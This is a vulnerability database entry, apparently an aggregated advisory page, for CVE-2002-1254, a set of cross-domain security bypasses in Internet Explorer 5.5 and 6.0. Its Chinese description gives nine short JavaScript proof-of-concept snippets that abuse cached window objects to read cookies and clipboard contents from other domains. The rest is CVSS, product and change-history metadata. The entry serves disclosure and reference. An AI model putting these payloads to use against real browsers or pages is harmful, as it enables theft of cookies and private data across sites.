CVE-2002-1254 (CNNVD-200212-009)
中文标题:
Microsoft Internet Explorer 安全漏洞
英文标题:
Internet Explorer 5.5 and 6.0 allows remote attackers to bypass the cross-domain security model and ...
漏洞描述
中文描述:
Microsoft Internet Explorer(IE)是美国微软(Microsoft)公司的一款Windows操作系统附带的Web浏览器。 Microsoft Internet Explorer是微软开发和维护的WEB浏览器。Internet Explorer在处理缓存对象(cached objects)时存在问题,远程攻击者可以利用这个漏洞执行其他域和安全区域中的脚本代码,造成信息泄露等问题。当窗口之间通信的时候,MSIE安全机制必须确保页面在同一安全区域和同一域中,而缓存对象处理中MSIE安全机制对访问控制检查不充分。当攻击者在自己站点页面中打开窗口时IE会缓存主窗口到子窗口的引用(类似C的指针),虽然这时候子窗口内访问的URL可能已经改变了,但主窗口通过调用引用还是能够被控制,这样就可能使的直接访问不同域和不同安全区域中的内容。攻击者可以通过构建恶意WEB页面,并诱使用户点击,窃取目标用户COOKIE信息,泄露目标用户本地系统文件。下面9个漏洞都是相关于对象缓存问题,但是每个漏洞都是独立的漏洞,使用独立的方法进行利用。下面所描述的包含3个部分,"Cache"显示怎样缓存有问题的对象,"Exploit"显示漏洞怎样工作,"Impact"描述漏洞的危害。"Full access"表示可以访问任意域和任意安全区域中的任意页面文档对象模型(DOM)。1. showModalDialogCache: var fVuln=oWin.showModalDialog;Exploit - IE 5.5:fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");Exploit - IE 6: 利用难度比较大,可使用"analyze.dlg"vulnerability.Impact: 在IE5.5中完全访问, IE6中"My Computer"安全区域可访问。2. externalCache: var oVuln=oWin.external;Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");Impact: Full access.3. createRangeCache: var fVuln=oWin.document.selection.createRange;Exploit: fVuln().pasteHTML("<imgsrc="javascript:alert(document.cookie)">");Impact: Full access.4. elementFromPointCache: var fVuln=oWin.document.elementFromPoint;Exploit: alert(fVuln(1,1).document.cookie);Impact: Full access.5. getElementByIdCache: var fVuln=oWin.document.getElementById;Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);Impact: Full access.6. getElementsByNameCache: var fVuln=oWin.document.getElementsByName;Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);Impact: Full access.7. getElementsByTagNameCache: var fVuln=oWin.document.getElementsByTagName;Exploit: alert(fVuln("BODY")[0].document.cookie);Impact: Full access.8. execCommandCache: var fVuln=oWin.document.execCommand;Exploit: fVuln("SelectAll"); fVuln("Copy");alert(clipboardData.getData("text"));Impact: 读区访问装载的文档9. clipboardDataCache: var oVuln=oWin.clipboardData;Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");Impact: 无需考虑设置,读/写访问剪贴板
英文描述:
Internet Explorer 5.5 and 6.0 allows remote attackers to bypass the cross-domain security model and access information on the local system or in other domains, and possibly execute code, via cached methods and objects, aka "Cross Domain Verification via Cached Methods."
CWE类型:
标签:
受影响产品
| 厂商 | 产品 | 版本 | 版本范围 | 平台 | CPE |
|---|---|---|---|---|---|
| microsoft | ie | 6.0 | - | - |
cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*
|
| microsoft | internet_explorer | 5.5 | - | - |
cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*
|
| microsoft | internet_explorer | 6.0 | - | - |
cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*
|
解决方案
中文解决方案:
英文解决方案:
临时解决方案:
参考链接
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
exploitdb
exploitdb
cve.org
CVSS评分详情
AV:N/AC:L/Au:N/C:P/I:P/A:P
时间信息
利用信息
数据源详情
| 数据源 | 记录ID | 版本 | 提取时间 |
|---|---|---|---|
| CVE | cve_CVE-2002-1254 |
2025-11-11 15:17:24 | 2025-11-11 07:32:16 |
| NVD | nvd_CVE-2002-1254 |
2025-11-11 14:50:28 | 2025-11-11 07:41:03 |
| CNNVD | cnnvd_CNNVD-200212-009 |
2025-11-11 15:08:41 | 2025-11-11 07:48:49 |
| EXPLOITDB | exploitdb_EDB-21959 |
2025-11-11 15:05:56 | 2025-11-11 08:16:39 |
版本与语言
安全公告
变更历史
查看详细变更
- references_count: 13 -> 16
- tags_count: 0 -> 4
- data_sources: ['cnnvd', 'cve', 'nvd'] -> ['cnnvd', 'cve', 'exploitdb', 'nvd']
查看详细变更
- vulnerability_type: 未提取 -> 其他
- cnnvd_id: 未提取 -> CNNVD-200212-009
- data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
查看详细变更
- severity: SeverityLevel.MEDIUM -> SeverityLevel.HIGH
- cvss_score: 未提取 -> 7.5
- cvss_vector: NOT_EXTRACTED -> AV:N/AC:L/Au:N/C:P/I:P/A:P
- cvss_version: NOT_EXTRACTED -> 2.0
- affected_products_count: 0 -> 3
- data_sources: ['cve'] -> ['cve', 'nvd']